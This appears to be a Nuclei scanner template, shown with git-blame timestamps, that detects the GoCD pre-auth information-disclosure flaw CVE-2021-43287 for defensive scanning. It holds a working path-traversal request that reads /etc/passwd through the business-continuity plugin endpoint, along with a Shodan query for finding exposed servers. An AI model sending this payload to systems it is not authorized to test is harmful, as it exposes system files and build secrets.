2021-11-06 07:04:04 +00:00
id : CVE-2021-43287
2021-11-04 20:00:11 +00:00
info :
2021-11-06 07:04:04 +00:00
name : Pre-Auth Takeover of Build Pipelines in GoCD
2021-11-04 20:00:11 +00:00
author : dhiyaneshDk
2022-05-17 09:18:12 +00:00
severity : high
2022-02-28 21:40:27 +00:00
description : GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.
2021-11-04 20:43:15 +00:00
reference :
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
2022-05-17 09:18:12 +00:00
- https://www.gocd.org/releases/#21-3-0
remediation : Upgrade to version v21.3.0. or later.
2022-02-28 18:19:21 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-02-28 18:19:21 +00:00
cve-id : CVE-2021-43287
2022-05-17 09:18:12 +00:00
cwe-id : CWE-200
2022-04-22 10:38:41 +00:00
metadata :
shodan-query : http.title:"Create a pipeline - Go",html:"GoCD Version"
tags : cve,cve2021,go,lfi,gocd,takeover
2021-11-04 21:26:16 +00:00
2021-11-04 20:00:11 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"
matchers-condition : and
matchers :
- type : status
status :
- 200
2021-11-06 07:04:04 +00:00
2021-11-04 20:00:11 +00:00
- type : regex
regex :
- "root:.*:0:0:"
2022-02-28 18:19:21 +00:00
# Enhanced by mp on 2022/02/28